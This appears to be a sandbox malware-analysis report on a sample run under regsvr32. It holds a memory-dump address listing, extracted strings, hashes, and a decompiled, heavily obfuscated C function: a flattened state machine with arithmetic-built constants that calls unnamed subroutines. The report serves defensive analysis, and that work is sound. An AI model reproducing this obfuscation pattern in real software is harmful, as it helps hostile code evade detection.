0x04b4d2d5
0x04b4d2e0
0x04b4d2eb
0x04b4d2f3
0x04b4d2fb
0x04b4d303
0x04b4d308
0x04b4d310
0x04b4d318
0x04b4d31d
0x04b4d325
0x04b4d330
0x04b4d33b
0x04b4d346
0x04b4d353
0x04b4d357
0x04b4d35c
0x04b4d361
0x04b4d369
0x04b4d371
0x04b4d376
0x04b4d37b
0x04b4d383
0x04b4d38b
0x04b4d390
0x04b4d398
0x04b4d3a0
0x04b4d3a5
0x04b4d3ad
0x04b4d3b5
0x04b4d3bd
0x04b4d3c8
0x04b4d3d5
0x04b4d3e0
0x04b4d3e8
0x04b4d3f6
0x04b4d3fb
0x04b4d401
0x04b4d409
0x04b4d411
0x04b4d419
0x04b4d421
0x04b4d429
0x04b4d431
0x04b4d436
0x04b4d43e
0x04b4d446
0x04b4d44e
0x04b4d456
0x04b4d45e
0x04b4d466
0x04b4d473
0x04b4d47b
0x04b4d47f
0x04b4d487
0x04b4d48f
0x04b4d494
0x04b4d49c
0x04b4d4a4
0x04b4d4ac
0x04b4d4b4
0x04b4d4bc
0x04b4d4c4
0x04b4d4cc
0x04b4d4d4
0x04b4d4dc
0x04b4d4e1
0x04b4d4e9
0x04b4d4f4
0x04b4d4fc
0x04b4d507
0x04b4d50f
0x04b4d51c
0x04b4d524
0x04b4d52c
0x04b4d53a
0x04b4d541
0x04b4d545
0x04b4d54d
0x04b4d555
0x04b4d55d
0x04b4d565
0x04b4d56d
0x04b4d575
0x04b4d57d
0x04b4d585
0x04b4d58d
0x04b4d597
0x04b4d59b
0x04b4d5a3
0x04b4d5ab
0x04b4d5b3
0x04b4d5b7
0x04b4d5bf
0x04b4d5c7
0x04b4d5d2
0x04b4d5dd
0x04b4d5e8
0x04b4d5e8
0x04b4d5e8
0x04b4d5ed
0x04b4d5ed
0x04b4d5ed
0x04b4d5ed
0x04b4d5f3
0x00000000
0x00000000
0x04b4d5f9
0x04b4d716
0x04b4d726
0x04b4d742
0x04b4d76a
0x04b4d76f
0x04b4d774
0x04b4d785
0x04b4d785
0x04b4d5e8
0x04b4d5e8
0x04b4d5e8
0x00000000
0x04b4d5e8
0x04b4d776
0x04b4d776
0x04b4d5e8
0x04b4d5e8
0x04b4d5e8
0x00000000
0x04b4d5e8
0x04b4d5e8
0x04b4d5ff
0x04b4d605
0x04b4d6dd
0x04b4d6ed
0x04b4d6df
0x04b4d6df
0x04b4d6df
0x04b4d6f2
0x04b4d6fb
0x04b4d700
0x00000000
0x04b4d60b
0x04b4d611
0x04b4d691
0x04b4d69a
0x04b4d69d
0x04b4d6a0
0x04b4d6a3
0x04b4d6a8
0x04b4d6ad
0x04b4d6ad
0x04b4d6b0
0x04b4d6b8
0x04b4d8c4
0x04b4d8ca
0x04b4d6be
0x04b4d6be
0x04b4d5e8
0x04b4d5e8
0x04b4d5e8
0x00000000
0x04b4d5e8
0x04b4d5e8
0x04b4d613
0x04b4d619
0x04b4d677
0x04b4d67c
0x04b4d681
0x04b4d687
0x04b4d5e8
0x04b4d5e8
0x04b4d5e8
0x00000000
0x04b4d5e8
0x04b4d5e8
0x04b4d61b
0x04b4d621
0x00000000
0x04b4d627
0x04b4d647
0x04b4d653
0x04b4d649
0x04b4d64b
0x04b4d650
0x04b4d650
0x04b4d658
0x04b4d5e8
0x04b4d5e8
0x04b4d5e8
0x00000000
0x04b4d5e8
0x04b4d5e8
0x04b4d621
0x04b4d619
0x04b4d611
0x04b4d605
0x04b4d8d1
0x04b4d8da
0x04b4d8da
0x04b4d795
0x04b4d87f
0x04b4d887
0x04b4d890
0x04b4d897
0x04b4d89c
0x04b4d8a3
0x04b4d8aa
0x00000000
0x04b4d79b
0x04b4d7a1
0x04b4d864
0x00000000
0x04b4d7a7
0x04b4d7ad
0x04b4d817
0x04b4d82a
0x04b4d845
0x04b4d84a
0x04b4d84d
0x04b4d8b1
0x04b4d8b1
0x00000000
0x04b4d7af
0x04b4d7b1
0x00000000
0x04b4d7b7
0x04b4d7ca
0x04b4d7cb
0x04b4d7d0
0x04b4d7dc
0x04b4d7dd
0x04b4d7de
0x04b4d7ee
0x04b4d7ef
0x04b4d7f4
0x04b4d7f7
0x00000000
0x04b4d7f7
0x04b4d7b1
0x04b4d7ad
0x04b4d7a1
0x00000000
0x04b4d8b6
0x04b4d8b6
0x00000000
0x04b4d8c2

Strings

<9, xrefs: 04B4D31D
}9, xrefs: 04B4D79B
aSa, xrefs: 04B4D5AB
>g, xrefs: 04B4D5B7
yT, xrefs: 04B4D592
C:, xrefs: 04B4D268
-c, xrefs: 04B4D3C8
0^, xrefs: 04B4D270
}9, xrefs: 04B4D658
ju~, xrefs: 04B4D429
8M, xrefs: 04B4D411
yT, xrefs: 04B4D5A3

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -c$0^$8M$>g$aSa$ju~$}9$}9$<9$C:$yT$yT
API String ID: 0-111235429
Opcode ID: ff85e622cae44cc4c47115c2185c36ea9b402f2ee7588b139afa902e0fe84dbd
Instruction ID: 6c8575dbb30874e1139551e7f530bd545f5012c2224cec595f8bf1c933277b1f
Opcode Fuzzy Hash: ff85e622cae44cc4c47115c2185c36ea9b402f2ee7588b139afa902e0fe84dbd
Instruction Fuzzy Hash: 7C0251712083809FD3A9CF25C489A6BBBF5FBC4358F50890DE69A86260D7B1D949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B357B8, Relevance: 14.4, Strings: 11, Instructions: 616
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04B357B8(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				void _v12;
				void _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				void* _t657;
				intOrPtr _t715;
				void* _t716;
				void* _t717;
				void* _t725;
				void* _t729;
				void* _t737;
				void* _t740;
				intOrPtr _t746;
				void* _t798;
				void* _t814;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				void* _t829;
				void* _t832;
				void* _t833;
				void* _t834;
				void* _t840;

				_push(_a24);
				_t746 = __edx;
				_push(_a20);
				_v224 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0x20);
				E04B4FE29(_t657);
				_v108 = 0x7f0a1;
				_t834 = _t833 + 0x20;
				_t832 = 0;
				_t740 = 0xa8b367c;
				_t816 = 0x72;
				_v108 = _v108 / _t816;
				_v108 = _v108 ^ 0x000011d4;
				_v220 = 0x3ea28;
				_v220 = _v220 | 0x6e60dce4;
				_v220 = _v220 << 0xd;
				_v220 = _v220 ^ 0x7fdd8000;
				_v272 = 0xf906dc;
				_v272 = _v272 + 0x5e9;
				_t817 = 0x7a;
				_v272 = _v272 * 0x15;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0x70614800;
				_v264 = 0x600b37;
				_v264 = _v264 / _t817;
				_v264 = _v264 ^ 0x262493f0;
				_t818 = 0x3e;
				_v264 = _v264 * 0x11;
				_v264 = _v264 ^ 0x886a01f8;
				_v260 = 0xf3d497;
				_v260 = _v260 / _t818;
				_v260 = _v260 >> 6;
				_v260 = _v260 >> 3;
				_v260 = _v260 ^ 0x000001f7;
				_v156 = 0x8d2235;
				_v156 = _v156 >> 0xe;
				_t819 = 0xe;
				_v156 = _v156 * 0x5b;
				_v156 = _v156 ^ 0x0000c87c;
				_v292 = 0xf4d;
				_v292 = _v292 + 0x4732;
				_v292 = _v292 << 0x10;
				_v292 = _v292 << 0xe;
				_v292 = _v292 ^ 0xc0000000;
				_v216 = 0x258eaf;
				_v216 = _v216 * 0x48;
				_v216 = _v216 / _t819;
				_v216 = _v216 ^ 0x00c126f1;
				_v96 = 0xf75e54;
				_v96 = _v96 + 0xffff74b2;
				_v96 = _v96 ^ 0x00f6d306;
				_v268 = 0x92da;
				_v268 = _v268 >> 0xc;
				_v268 = _v268 + 0x1646;
				_v268 = _v268 << 0xd;
				_v268 = _v268 ^ 0x02c9e000;
				_v196 = 0xf0429c;
				_t820 = 0x3d;
				_v196 = _v196 * 0x60;
				_v196 = _v196 >> 3;
				_v196 = _v196 ^ 0x0b431f50;
				_v232 = 0x6bfae5;
				_v232 = _v232 / _t820;
				_v232 = _v232 >> 4;
				_v232 = _v232 * 0x6e;
				_v232 = _v232 ^ 0x000c2b3c;
				_v40 = 0xa24143;
				_v40 = _v40 + 0xffff9191;
				_v40 = _v40 ^ 0x00a231cd;
				_v80 = 0x435983;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000556e3;
				_v180 = 0x94eafd;
				_v180 = _v180 + 0x1d08;
				_v180 = _v180 | 0xe944a694;
				_v180 = _v180 ^ 0xe9df3ebb;
				_v228 = 0xbcce84;
				_v228 = _v228 + 0xffff815d;
				_v228 = _v228 ^ 0xe4fbb881;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x0005fd7e;
				_v112 = 0x2fdad;
				_v112 = _v112 ^ 0x4ab81af1;
				_v112 = _v112 ^ 0x4abb9e1a;
				_v64 = 0x50dc85;
				_v64 = _v64 + 0xffff4d8c;
				_v64 = _v64 ^ 0x005cdb40;
				_v52 = 0x47f34d;
				_v52 = _v52 + 0xffff898a;
				_v52 = _v52 ^ 0x004c7feb;
				_v72 = 0xc369b0;
				_v72 = _v72 * 0x64;
				_v72 = _v72 ^ 0x4c5d6799;
				_v132 = 0xe6e6b0;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 * 0x6c;
				_v132 = _v132 ^ 0x00059f00;
				_v172 = 0x544ea4;
				_v172 = _v172 << 5;
				_v172 = _v172 | 0xc018668b;
				_v172 = _v172 ^ 0xca962b34;
				_v148 = 0x61f17d;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 + 0xffff8980;
				_v148 = _v148 ^ 0xfffa8c30;
				_v100 = 0xf619bc;
				_v100 = _v100 >> 0xa;
				_v100 = _v100 ^ 0x00008a95;
				_v200 = 0xa94e7a;
				_v200 = _v200 + 0xa696;
				_v200 = _v200 + 0xffff4550;
				_v200 = _v200 ^ 0x00a03757;
				_v208 = 0x57e0ef;
				_v208 = _v208 ^ 0x592bbff9;
				_v208 = _v208 ^ 0x4b5d2b88;
				_v208 = _v208 ^ 0x1221726f;
				_v284 = 0x804076;
				_v284 = _v284 ^ 0x9dc3529f;
				_v284 = _v284 + 0x2ad8;
				_v284 = _v284 << 7;
				_v284 = _v284 ^ 0xa19e17b3;
				_v176 = 0xb506b1;
				_v176 = _v176 | 0xc528794d;
				_v176 = _v176 + 0x810e;
				_v176 = _v176 ^ 0xc5bbfa9c;
				_v184 = 0x64408f;
				_v184 = _v184 << 3;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 ^ 0x00066ce1;
				_v252 = 0x9e8dfe;
				_v252 = _v252 | 0x2316ff28;
				_v252 = _v252 + 0xbb4b;
				_v252 = _v252 ^ 0x205df49d;
				_v252 = _v252 ^ 0x03c75996;
				_v192 = 0x20a385;
				_v192 = _v192 ^ 0x2edbbce0;
				_v192 = _v192 >> 5;
				_v192 = _v192 ^ 0x017066cd;
				_v312 = 0x989161;
				_v312 = _v312 + 0xa008;
				_v312 = _v312 + 0x4ac;
				_v312 = _v312 | 0x9f8d4417;
				_v312 = _v312 ^ 0x9f9ed397;
				_v320 = 0x6ba986;
				_t821 = 0x4d;
				_v320 = _v320 * 0x35;
				_v320 = _v320 + 0x6b8c;
				_v320 = _v320 + 0x347b;
				_v320 = _v320 ^ 0x164ad328;
				_v236 = 0xcaa528;
				_v236 = _v236 + 0x2035;
				_v236 = _v236 | 0x7bffa27f;
				_v236 = _v236 ^ 0x7bfdb1d6;
				_v276 = 0xb040eb;
				_v276 = _v276 * 0x3a;
				_v276 = _v276 >> 2;
				_v276 = _v276 >> 0xb;
				_v276 = _v276 ^ 0x00065548;
				_v280 = 0xf1680b;
				_v280 = _v280 >> 0xa;
				_v280 = _v280 >> 1;
				_v280 = _v280 >> 0xd;
				_v280 = _v280 ^ 0x00049c20;
				_v288 = 0x575f50;
				_v288 = _v288 << 0xe;
				_v288 = _v288 | 0xa77b0e2e;
				_v288 = _v288 * 0x52;
				_v288 = _v288 ^ 0x6fbbe03a;
				_v296 = 0x568d1e;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 >> 6;
				_v296 = _v296 >> 9;
				_v296 = _v296 ^ 0x0008fa1d;
				_v304 = 0xd1fef6;
				_v304 = _v304 << 0x10;
				_v304 = _v304 * 0x2d;
				_v304 = _v304 << 9;
				_v304 = _v304 ^ 0x7c01ef7f;
				_v92 = 0xea5a63;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0x4b4e4928;
				_v76 = 0xf64e35;
				_v76 = _v76 + 0xbf9b;
				_v76 = _v76 ^ 0x00fbc5d2;
				_v248 = 0xc75c6;
				_v248 = _v248 ^ 0x54d7d0af;
				_v248 = _v248 / _t821;
				_v248 = _v248 | 0x9c98695d;
				_v248 = _v248 ^ 0x9d9ac3a5;
				_v256 = 0x504a74;
				_v256 = _v256 | 0x8719e45c;
				_v256 = _v256 * 0x7b;
				_v256 = _v256 ^ 0x8d2796a4;
				_v256 = _v256 ^ 0x85162cc6;
				_v84 = 0x519e4e;
				_v84 = _v84 ^ 0x8be7953d;
				_v84 = _v84 ^ 0x8bbbe938;
				_v168 = 0x311266;
				_v168 = _v168 ^ 0x18ab2cb8;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x3478f01c;
				_v60 = 0x61fbf7;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 ^ 0x000e504b;
				_v240 = 0xf8ae17;
				_v240 = _v240 >> 3;
				_v240 = _v240 | 0x050ada64;
				_v240 = _v240 ^ 0x567c7cbc;
				_v240 = _v240 ^ 0x53659cbf;
				_v68 = 0xee6d4a;
				_t374 =  &_v68; // 0xee6d4a
				_t822 = 0x49;
				_v68 =  *_t374 * 0xf;
				_v68 = _v68 ^ 0x0dff5dbc;
				_v300 = 0x550c32;
				_v300 = _v300 * 0x12;
				_v300 = _v300 + 0xffff8d7f;
				_v300 = _v300 << 1;
				_v300 = _v300 ^ 0x0bfb5da9;
				_v124 = 0x6baac1;
				_v124 = _v124 * 0x60;
				_t823 = 0x6f;
				_v124 = _v124 / _t822;
				_v124 = _v124 ^ 0x0084cf47;
				_v188 = 0xec1707;
				_v188 = _v188 << 0xc;
				_v188 = _v188 + 0x1505;
				_v188 = _v188 ^ 0xc1795754;
				_v244 = 0xd962f7;
				_v244 = _v244 + 0xffffa966;
				_v244 = _v244 | 0x93df07c8;
				_v244 = _v244 >> 1;
				_v244 = _v244 ^ 0x49e87f80;
				_v48 = 0x35494e;
				_v48 = _v48 / _t823;
				_v48 = _v48 ^ 0x000830fa;
				_v88 = 0x633bdd;
				_v88 = _v88 + 0xc138;
				_v88 = _v88 ^ 0x006a2257;
				_v56 = 0x559d1c;
				_v56 = _v56 + 0xffff12d8;
				_v56 = _v56 ^ 0x005735ca;
				_v104 = 0xdd1aac;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0x0dd90d21;
				_v44 = 0x4278da;
				_t824 = 0x4e;
				_v44 = _v44 * 0x42;
				_v44 = _v44 ^ 0x112c636d;
				_v116 = 0x4ec2e;
				_v116 = _v116 + 0xffff43d8;
				_v116 = _v116 ^ 0x00065017;
				_v308 = 0xc5e4c2;
				_v308 = _v308 * 0x26;
				_v308 = _v308 + 0xa26d;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x25c4a583;
				_v36 = 0x60fc2;
				_v36 = _v36 * 0x2e;
				_v36 = _v36 ^ 0x011987ae;
				_v140 = 0x8a5839;
				_v140 = _v140 << 0xb;
				_v140 = _v140 / _t824;
				_v140 = _v140 ^ 0x010a1534;
				_t814 = 0x30e419;
				_v204 = 0x180842;
				_v204 = _v204 ^ 0x577ac785;
				_v204 = _v204 + 0x1256;
				_v204 = _v204 ^ 0x5761cb73;
				_v136 = 0xcc77c3;
				_v136 = _v136 | 0x2e5c8e9b;
				_t825 = 0x3c;
				_v12 = 0xc2dfee2;
				_v16 = 0x8d06406;
				_v136 = _v136 * 0x19;
				_v136 = _v136 ^ 0x93985978;
				_v144 = 0xcb98e2;
				_v144 = _v144 ^ 0x2e2af391;
				_v144 = _v144 + 0xffff95d2;
				_v144 = _v144 ^ 0x2ee989ff;
				_v152 = 0x6e8dcb;
				_v152 = _v152 * 0x64;
				_v152 = _v152 ^ 0xf6de88b0;
				_v152 = _v152 ^ 0xddf9340f;
				_v160 = 0x1f41c3;
				_v160 = _v160 / _t825;
				_v160 = _v160 ^ 0x710c49d1;
				_v160 = _v160 ^ 0x7106b0fc;
				_v164 = 0xea0060;
				_v164 = _v164 << 2;
				_t826 = 0x54;
				_v164 = _v164 * 0x51;
				_v164 = _v164 ^ 0x2820691f;
				_v212 = 0x1a562c;
				_v212 = _v212 + 0xffff6884;
				_v212 = _v212 / _t826;
				_v212 = _v212 ^ 0x000ca439;
				_v316 = 0xc049a;
				_t827 = 0x4a;
				_v316 = _v316 / _t827;
				_v316 = _v316 >> 0xd;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x000978cf;
				_v120 = 0xbc159f;
				_t828 = 0x75;
				_v120 = _v120 * 0x6f;
				_t829 = 0x3acf932;
				_v120 = _v120 / _t828;
				_v120 = _v120 ^ 0x00bb77de;
				_v128 = 0x83c7e3;
				_v128 = _v128 ^ 0x1c1c3aef;
				_v128 = _v128 ^ 0x03a71d14;
				_v128 = _v128 ^ 0x1f3d9b10;
				while(1) {
					L1:
					while(1) {
						do {
							while(1) {
								L3:
								_t840 = _t740 - 0x6051746;
								if(_t840 <= 0) {
									break;
								}
								__eflags = _t740 - 0x644521d;
								if(_t740 == 0x644521d) {
									L04B512C1(_v32, _v136, _v144, _v152, _v160);
									_t740 = 0x4160ee8;
									goto L25;
								} else {
									__eflags = _t740 - 0x8d06406;
									if(_t740 == 0x8d06406) {
										_push(_t746);
										_push(_t746);
										_t715 = E04B3C5D8(_v20);
										_t746 = _v224;
										_t834 = _t834 + 0xc;
										__eflags = _t715;
										_v24 = _t715;
										_t798 = 0x26ffc0;
										_t740 =  !=  ? 0x26ffc0 : _t814;
										_t716 = 0x5dc2900;
										continue;
									} else {
										__eflags = _t740 - 0xa8b367c;
										if(__eflags == 0) {
											_t740 = 0x6051746;
											continue;
										} else {
											__eflags = _t740 - 0xc2dfee2;
											if(__eflags == 0) {
												_push(_v276);
												_push(_v236);
												_push(_v320);
												_t737 = L04B3F288(_v272, _v280, E04B4E1F8(0x4b313f8, _v312, __eflags), _v288,  &_v8,  &_v20, _v296, 0x4b313f8, _v304, _v28, _v92);
												_t834 = _t834 + 0x30;
												__eflags = _t737 - _v264;
												_t740 =  ==  ? _v16 : _t814;
												E04B4FECB(_t734, _v76, _v248, _v256, _v84);
												L16:
												_t829 = 0x3acf932;
												L25:
												_t746 = _v224;
												_t834 = _t834 + 0xc;
												_t798 = 0x26ffc0;
											}
											goto L26;
										}
									}
								}
								L29:
								return _t832;
							}
							if(_t840 == 0) {
								_push(_v228);
								_push(_v180);
								_push(_v80);
								_t717 = E04B4E1F8(0x4b313a8, _v40, __eflags);
								_push(_v72);
								_push(_v52);
								_push(_v64);
								__eflags = L04B3738A(_v132, _t717, _v172, _v108,  &_v28, E04B4E1F8(0x4b31318, _v112, __eflags), _v148) - _v220;
								_t740 =  ==  ? _v12 : 0x1841daf;
								E04B4FECB(_t717, _v100, _v200, _v208, _v284);
								_t834 = _t834 + 0x38;
								E04B4FECB(_t718, _v176, _v184, _v252, _v192);
								_t814 = 0x30e419;
								goto L16;
							} else {
								if(_t740 == _t798) {
									_t725 = L04B31BC9(_v260, _v28, _v300, _v124, _v20, _v188, _v244, _v156, _v24,  &_v32, _v48, _v88);
									_t834 = _t834 + 0x2c;
									__eflags = _t725 - _v292;
									_t746 = _v224;
									_t716 = 0x5dc2900;
									_t740 =  ==  ? 0x5dc2900 : 0x4160ee8;
									goto L3;
								} else {
									if(_t740 == _t814) {
										E04B3F7FE(_v120, _v28, _v128, _v232);
									} else {
										if(_t740 == _t829) {
											_t729 = L04B322C9(_v308, _v36, _v32, 0x20, _a20, _v140, _v204, _v268);
											_t834 = _t834 + 0x18;
											_t740 = 0x644521d;
											__eflags = _t729 - _v196;
											_t832 =  ==  ? 1 : _t832;
											goto L11;
										} else {
											if(_t740 == 0x4160ee8) {
												L04B52B09(_v164, _v24, _v212, _v316);
												_t740 = _t814;
												goto L11;
											} else {
												if(_t740 != _t716) {
													goto L26;
												} else {
													L04B4CBE9(_v216, _a12, _v56, _t746, _v104, _v44, _v116, _v32);
													_t834 = _t834 + 0x18;
													_t740 =  ==  ? _t829 : 0x644521d;
													L11:
													_t746 = _v224;
													goto L1;
												}
											}
										}
									}
								}
							}
							goto L29;
							L26:
							__eflags = _t740 - 0x1841daf;
						} while (__eflags != 0);
						goto L29;
					}
				}
			}

0x04b357c2
0x04b357c9
0x04b357cb
0x04b357d2
0x04b357d6
0x04b357dd
0x04b357e4
0x04b357eb
0x04b357f2
0x04b357f3
0x04b357f5
0x04b357fa
0x04b35805
0x04b35811
0x04b35813
0x04b3581a
0x04b3581f
0x04b35828
0x04b35833
0x04b3583b
0x04b35843
0x04b35848
0x04b35850
0x04b35858
0x04b35865
0x04b35868
0x04b3586c
0x04b35871
0x04b35879
0x04b35889
0x04b3588d
0x04b3589a
0x04b3589d
0x04b358a1
0x04b358a9
0x04b358b9
0x04b358bd
0x04b358c2
0x04b358c7
0x04b358cf
0x04b358da
0x04b358ea
0x04b358eb
0x04b358f2
0x04b358fd
0x04b35905
0x04b3590d
0x04b35912
0x04b35917
0x04b3591f
0x04b3592c
0x04b35936
0x04b3593a
0x04b35942
0x04b3594d
0x04b35958
0x04b35963
0x04b3596b
0x04b35972
0x04b3597a
0x04b3597f
0x04b35987
0x04b3599c
0x04b3599d
0x04b359a4
0x04b359ac
0x04b359b7
0x04b359c5
0x04b359c9
0x04b359d3
0x04b359d7
0x04b359df
0x04b359ea
0x04b359f5
0x04b35a00
0x04b35a0b
0x04b35a13
0x04b35a1e
0x04b35a29
0x04b35a34
0x04b35a3f
0x04b35a4a
0x04b35a52
0x04b35a5a
0x04b35a62
0x04b35a67
0x04b35a6f
0x04b35a7a
0x04b35a85
0x04b35a90
0x04b35a9b
0x04b35aa6
0x04b35ab1
0x04b35abc
0x04b35ac7
0x04b35ad2
0x04b35ae5
0x04b35aec
0x04b35af7
0x04b35b02
0x04b35b12
0x04b35b19
0x04b35b24
0x04b35b2f
0x04b35b37
0x04b35b42
0x04b35b4d
0x04b35b58
0x04b35b60
0x04b35b6b
0x04b35b76
0x04b35b81
0x04b35b89
0x04b35b94
0x04b35b9f
0x04b35baa
0x04b35bb5
0x04b35bc0
0x04b35bcb
0x04b35bd6
0x04b35be1
0x04b35bec
0x04b35bf4
0x04b35bfc
0x04b35c04
0x04b35c09
0x04b35c11
0x04b35c1c
0x04b35c27
0x04b35c32
0x04b35c3d
0x04b35c4a
0x04b35c52
0x04b35c5a
0x04b35c65
0x04b35c6d
0x04b35c75
0x04b35c7d
0x04b35c85
0x04b35c8d
0x04b35c98
0x04b35ca3
0x04b35cab
0x04b35cb6
0x04b35cbe
0x04b35cc6
0x04b35cce
0x04b35cd6
0x04b35cde
0x04b35ced
0x04b35cee
0x04b35cf2
0x04b35cfa
0x04b35d02
0x04b35d0a
0x04b35d12
0x04b35d1a
0x04b35d22
0x04b35d2a
0x04b35d37
0x04b35d3b
0x04b35d40
0x04b35d45
0x04b35d4d
0x04b35d55
0x04b35d5a
0x04b35d5e
0x04b35d63
0x04b35d6b
0x04b35d73
0x04b35d78
0x04b35d85
0x04b35d89
0x04b35d91
0x04b35d99
0x04b35d9e
0x04b35da3
0x04b35da8
0x04b35db0
0x04b35db8
0x04b35dc2
0x04b35dc6
0x04b35dcb
0x04b35dd3
0x04b35dde
0x04b35de6
0x04b35df1
0x04b35dfc
0x04b35e07
0x04b35e12
0x04b35e1a
0x04b35e28
0x04b35e2c
0x04b35e34
0x04b35e3c
0x04b35e44
0x04b35e51
0x04b35e55
0x04b35e5d
0x04b35e65
0x04b35e70
0x04b35e7b
0x04b35e86
0x04b35e93
0x04b35e9e
0x04b35ea6
0x04b35eb1
0x04b35ebc
0x04b35ec4
0x04b35ecf
0x04b35ed7
0x04b35edc
0x04b35ee4
0x04b35eec
0x04b35ef4
0x04b35eff
0x04b35f09
0x04b35f0c
0x04b35f13
0x04b35f1e
0x04b35f2b
0x04b35f2f
0x04b35f37
0x04b35f3b
0x04b35f43
0x04b35f56
0x04b35f66
0x04b35f67
0x04b35f70
0x04b35f7b
0x04b35f86
0x04b35f8e
0x04b35f99
0x04b35fa4
0x04b35fac
0x04b35fb4
0x04b35fbc
0x04b35fc0
0x04b35fc8
0x04b35fde
0x04b35fe5
0x04b35ff0
0x04b35ffb
0x04b36006
0x04b36011
0x04b3601c
0x04b36027
0x04b36032
0x04b3603d
0x04b36045
0x04b36050
0x04b36063
0x04b36064
0x04b3606b
0x04b36076
0x04b36081
0x04b3608c
0x04b36097
0x04b360a4
0x04b360a8
0x04b360b0
0x04b360b5
0x04b360bd
0x04b360d0
0x04b360d7
0x04b360e2
0x04b360ed
0x04b36102
0x04b3610b
0x04b36116
0x04b3611b
0x04b36126
0x04b36131
0x04b3613c
0x04b36147
0x04b36152
0x04b36165
0x04b36168
0x04b36173
0x04b3617e
0x04b36185
0x04b36190
0x04b3619b
0x04b361a6
0x04b361b1
0x04b361bc
0x04b361cf
0x04b361d6
0x04b361e1
0x04b361ec
0x04b36202
0x04b36209
0x04b36214
0x04b3621f
0x04b3622a
0x04b3623a
0x04b3623d
0x04b36244
0x04b3624f
0x04b3625a
0x04b36270
0x04b36277
0x04b36282
0x04b3628e
0x04b36293
0x04b36299
0x04b3629e
0x04b362a3
0x04b362ab
0x04b362be
0x04b362bf
0x04b362cf
0x04b362d4
0x04b362db
0x04b362e6
0x04b362f1
0x04b362fc
0x04b36307
0x04b36312
0x04b36312
0x04b36317
0x04b3631c
0x04b3631c
0x04b3631c
0x04b3631c
0x04b36322
0x00000000
0x00000000
0x04b36578
0x04b3657e
0x04b366b2
0x04b366b7
0x00000000
0x04b36584
0x04b36584
0x04b3658a
0x04b3665a
0x04b3665b
0x04b36663
0x04b36668
0x04b3666f
0x04b36672
0x04b36674
0x04b3667d
0x04b36682
0x04b36685
0x00000000
0x04b36590
0x04b36590
0x04b36596
0x04b36637
0x00000000
0x04b3659c
0x04b3659c
0x04b365a2
0x04b365a8
0x04b365b1
0x04b365b5
0x04b365fb
0x04b36600
0x04b3660b
0x04b36616
0x04b3662d
0x04b3656e
0x04b3656e
0x04b366bc
0x04b366bc
0x04b366c3
0x04b366cb
0x04b366cb
0x00000000
0x04b365a2
0x04b36596
0x04b3658a
0x04b36700
0x04b3670a
0x04b3670a
0x04b36328
0x04b3648f
0x04b36498
0x04b3649f
0x04b364ad
0x04b364bc
0x04b364c3
0x04b364ca
0x04b3651c
0x04b36524
0x04b36541
0x04b36546
0x04b36564
0x04b36569
0x00000000
0x04b3632e
0x04b36330
0x04b36469
0x04b36470
0x04b3647c
0x04b3647e
0x04b36482
0x04b36487
0x00000000
0x04b36336
0x04b36338
0x04b366f7
0x04b3633e
0x04b36340
0x04b363fd
0x04b3640e
0x04b36411
0x04b36416
0x04b36418
0x00000000
0x04b36346
0x04b3634c
0x04b363c5
0x04b363cc
0x00000000
0x04b3634e
0x04b36350
0x00000000
0x04b36356
0x04b36388
0x04b3638f
0x04b363a0
0x04b363a3
0x04b363a3
0x00000000
0x04b363a3
0x04b36350
0x04b3634c
0x04b36340
0x04b36338
0x04b36330
0x00000000
0x04b366d0
0x04b366d0
0x04b366d0
0x00000000
0x04b366dc
0x04b36317

Strings

(INK, xrefs: 04B35DE6
